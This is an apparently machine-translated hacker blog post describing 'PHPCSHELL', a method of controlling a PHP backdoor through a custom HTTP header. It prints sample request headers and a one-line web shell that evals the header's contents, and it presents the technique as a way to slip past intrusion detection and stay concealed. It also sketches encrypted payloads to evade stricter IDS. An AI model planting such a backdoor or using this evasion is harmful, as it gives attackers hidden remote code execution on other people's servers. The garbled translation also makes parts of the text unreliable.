Http://www.vul.kr /? P = 455 Author: TTFCT
In, the http header was found to be customizable and the specified code was inserted. In February, the phpcshell c/s tool was successfully completed, and the TOOL was used to bypass IDS, in, I encountered a situation where WSC POST submission could not be successfully connected, but PHPCSHELL was used for successful connection, which was always used and concealed.
After talking about that, Let's explain the principles of PHPCSHELL:
Let's take a look at an http header.
GET, HTTP, 1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd. ms-xpsdocument, application/xaml + xml, application/x-ms-xbap, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/x-shockwave-flash ,*/*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Server Load balancer;. net clr 2.0.50727;. net clr 3.0.30729;. net clr 3.5.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www. vul. kr
Connection: Keep-Alive
Cookie: www. vul. kr
The http header contains Accept, Accept-Language, User-Agent, Host, and other information. I published an article about BBSXP two years ago, which allows injection by modifying the User-Agent, in addition to modification, you can also add items to the http header, as shown in the following code:
Vulnerable: welcome to www. vul. kr
The complete http header is as follows:
GET, HTTP, 1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd. ms-xpsdocument, application/xaml + xml, application/x-ms-xbap, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/x-shockwave-flash ,*/*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Server Load balancer;. net clr 2.0.50727;. net clr 3.0.30729;. net clr 3.5.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www. vul. kr
Vulnerable: welcome to www. vul. kr
Connection: Keep-Alive
Cookie: websitecookie
On the server side, the receiving code is as follows:
<? Php
Echo ($ _ SERVER [HTTP_Vulnerable]);
?>
After the HTTP packet NC is submitted, "welcome to www. vul. kr ", so that we can GET the custom information of the http header. The submitted data of POST and GET can be made into one sentence. Of course, the http header packet can also be submitted, and some IDS can be bypassed, this is why I have been using PHPCSHELL.
If the server changes:
<? Php
Eval ($ _ SERVER [HTTP_Vulnerable]);
?>
Is it a typical sentence :)
Some IDS are very BT and will check the http header. If you want to bypass them, there is still a method. The prompt is: Packet Encryption, server decryption, and execution.
The PHPCSHELL graph is intended to be the same as the WSC function, but it has a large workload and has no time to write.
PS: there is a limit on the number of characters allowed for http header submission. Length: 8184.
Welcome to http://www.vul.kr.